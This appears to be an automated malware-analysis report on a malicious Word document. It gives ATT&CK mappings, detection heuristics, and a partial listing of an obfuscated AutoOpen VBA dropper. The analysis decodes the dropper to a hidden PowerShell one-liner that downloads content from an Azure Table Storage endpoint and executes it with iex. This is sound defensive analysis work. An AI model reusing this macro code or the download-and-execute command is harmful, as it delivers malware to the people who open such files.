Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word document whose VBA project contains an AutoOpen macro (standard module "prodigy" in the extract below) that assembles a command line and passes it to Shell(). Two obfuscation layers are visible in the recovered source. First, the command line DL_TC is built one character at a time from an index table FL_PH; replaying the appends present in the preview yields "powershell -windowstyle hidden -executionpolicy byp" before the preview is cut off, so the interpreter is PowerShell (T1059.001, which the ATT&CK mapping above does not list). Second, the script is carried as short base64 fragments concatenated into IT_TJ. Read as base64 of UTF-16LE text, which is what PowerShell's -EncodedCommand expects, the fragments in the preview decode to

function a($x){return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($x))};iex $(a $($($(invoke-webrequest 'https://ussprd5150central.table.core.windows.net/warehouse?$filter=PartitionKey%20eq%20%27stage%27&$Select=data&sv=2017-0

and stop there: a helper that base64-decodes its argument, then iex applied to the response of an invoke-webrequest against an Azure Table Storage REST endpoint (an OData query selecting the data column of rows whose PartitionKey is 'stage'). The sv= parameter is the start of a shared access signature; the rest of the SAS token, any remaining arguments and the second-stage payload itself are not in the preview, so the full URL cannot be reconstructed from it. Decode the complete 6215-byte macros.bas artifact for that. Operationally, the hostname is a storage-account name under the legitimate table.core.windows.net domain, so block or hunt on the full account name and URL rather than on the parent domain.
Heuristics (7)

- CLAMAV_DETECTION [critical]: ClamAV detected this file as malware: Doc.Dropper.Agent-6466406-0
- OLE_VBA_MACROS [medium, 3 related findings]: Document contains VBA macro code
- OLE_VBA_SHELL [critical]: Shell() call in VBA
- OLE_VBA_AUTOOPEN [high]: AutoOpen macro
- OLE_VBA_PCODE_AUTOEXEC_EXEC [high]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE_LEGACY_WORDBASIC_AUTOEXEC [medium]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this wording conflicts with the extracted macros.bas artifact below, which is a recovered VBA project; treat this finding as the same AutoOpen marker seen by a second parser rather than as an independent indicator.
- EMBEDDED_URL [info]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML namespace URI, present in benign Office files as well; it is not a network indicator for this sample.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6215 bytes | 08bdb37ec23c670408d2b410b19d589136fbde310ba2449ef7816fc5b96fb857 |
Preview of the extracted script (first 1,000 lines). The listing is cut off at the line marked "... (truncated)", before the Shell() call and the end of the base64 fragments. olevba concatenates modules, so the listing opens with the attribute header of the ThisDocument class module and continues with a standard module named "prodigy" that holds AutoOpen.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "prodigy"
Sub AutoOpen()
Dim DL_TC As String
FL_PH = Array("c", " ", "w", "u", "e", "h", "b", "o", "-", "a", "d", "n", "p", "t", "y", "s", "r", "x", "i", "l")
Dim EP_TH As String
EP_TH = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
DL_TC = DL_TC + FL_PH(12)
DL_TC = DL_TC + FL_PH(7)
Dim IS_NH As String
IS_NH = "AHsAcgBlAHQAdQByAG4A"
DL_TC = DL_TC + FL_PH(2)
DL_TC = DL_TC + FL_PH(4)
Dim JK_MD As String
JK_MD = "IABbAFMAeQBzAHQA"
DL_TC = DL_TC + FL_PH(16)
DL_TC = DL_TC + FL_PH(15)
Dim EQ_TI As String
EQ_TI = "ZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
DL_TC = DL_TC + FL_PH(5)
DL_TC = DL_TC + FL_PH(4)
Dim IP_KF As String
IP_KF = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAa"
IT_TJ = IT_TJ & EP_TH & IS_NH & JK_MD & EQ_TI & IP_KF
DL_TC = DL_TC + FL_PH(19)
DL_TC = DL_TC + FL_PH(19)
Dim CQ_PH As String
CQ_PH = "QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIA"
DL_TC = DL_TC + FL_PH(1)
DL_TC = DL_TC + FL_PH(8)
Dim FM_QD As String
FM_QD = "dABdADoAOgB"
DL_TC = DL_TC + FL_PH(2)
DL_TC = DL_TC + FL_PH(18)
Dim BS_NJ As String
BS_NJ = "GAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb"
DL_TC = DL_TC + FL_PH(11)
DL_TC = DL_TC + FL_PH(10)
Dim FP_PA As String
FP_PA = "gBnACgAJAB"
DL_TC = DL_TC + FL_PH(7)
DL_TC = DL_TC + FL_PH(2)
Dim HS_KB As String
HS_KB = "4ACkAKQB9ADsAaQBlAHgAIAAkACgAYQAgACQ"
IT_TJ = IT_TJ & CQ_PH & FM_QD & BS_NJ & FP_PA & HS_KB
DL_TC = DL_TC + FL_PH(15)
DL_TC = DL_TC + FL_PH(13)
Dim BQ_OI As String
BQ_OI = "AKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBl"
DL_TC = DL_TC + FL_PH(14)
DL_TC = DL_TC + FL_PH(19)
Dim CN_LI As String
CN_LI = "AHEAdQBlAHMAdAA"
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(1)
Dim AS_OJ As String
AS_OJ = "gACcAaAB0AHQAcABzADoALwAvAHUAc"
DL_TC = DL_TC + FL_PH(5)
DL_TC = DL_TC + FL_PH(18)
Dim BL_RF As String
BL_RF = "wBwAHIAZA"
DL_TC = DL_TC + FL_PH(10)
DL_TC = DL_TC + FL_PH(10)
Dim HK_PC As String
HK_PC = "A1ADEANQAwAGMAZQBuAHQAcgB"
IT_TJ = IT_TJ & BQ_OI & CN_LI & AS_OJ & BL_RF & HK_PC
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(11)
Dim JP_TI As String
JP_TI = "hAGwALgB0AGEAYgBsAGUALgBj"
DL_TC = DL_TC + FL_PH(1)
DL_TC = DL_TC + FL_PH(8)
Dim BR_KI As String
BR_KI = "AG8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8A"
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(17)
Dim GS_PI As String
GS_PI = "dwBhAHIAZQBoAG8"
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(0)
Dim FO_QA As String
FO_QA = "AdQBzAGUAPwAkAGYAaQBsAH"
DL_TC = DL_TC + FL_PH(3)
DL_TC = DL_TC + FL_PH(13)
Dim IR_TA As String
IR_TA = "QAZQByAD0AUABhAHIAdABpAHQAaQB"
IT_TJ = IT_TJ & JP_TI & BR_KI & GS_PI & FO_QA & IR_TA
DL_TC = DL_TC + FL_PH(18)
DL_TC = DL_TC + FL_PH(7)
Dim DT_MB As String
DT_MB = "vAG4ASwBlAHkAJQAyADAAZQBxACUAMgAwA"
DL_TC = DL_TC + FL_PH(11)
DL_TC = DL_TC + FL_PH(12)
Dim EK_PI As String
EK_PI = "CUAMgA3AHMAdABhAGcAZQA"
DL_TC = DL_TC + FL_PH(7)
DL_TC = DL_TC + FL_PH(19)
Dim AQ_OJ As String
AQ_OJ = "lADIANwAm"
DL_TC = DL_TC + FL_PH(18)
DL_TC = DL_TC + FL_PH(0)
Dim IO_NJ As String
IO_NJ = "ACQAUwBlAGwAZQB"
DL_TC = DL_TC + FL_PH(14)
DL_TC = DL_TC + FL_PH(1)
Dim FM_MB As String
FM_MB = "jAHQAPQBkAGEAdABh"
IT_TJ = IT_TJ & DT_MB & EK_PI & AQ_OJ & IO_NJ & FM_MB
DL_TC = DL_TC + FL_PH(6)
DL_TC = DL_TC + FL_PH(14)
Dim DK_RJ As String
DK_RJ = "ACYAcwB2AD0AMgAwADEANwAtADA"
DL_TC = DL_TC + FL_PH(12)
DL_TC = DL_TC + FL_
... (truncated)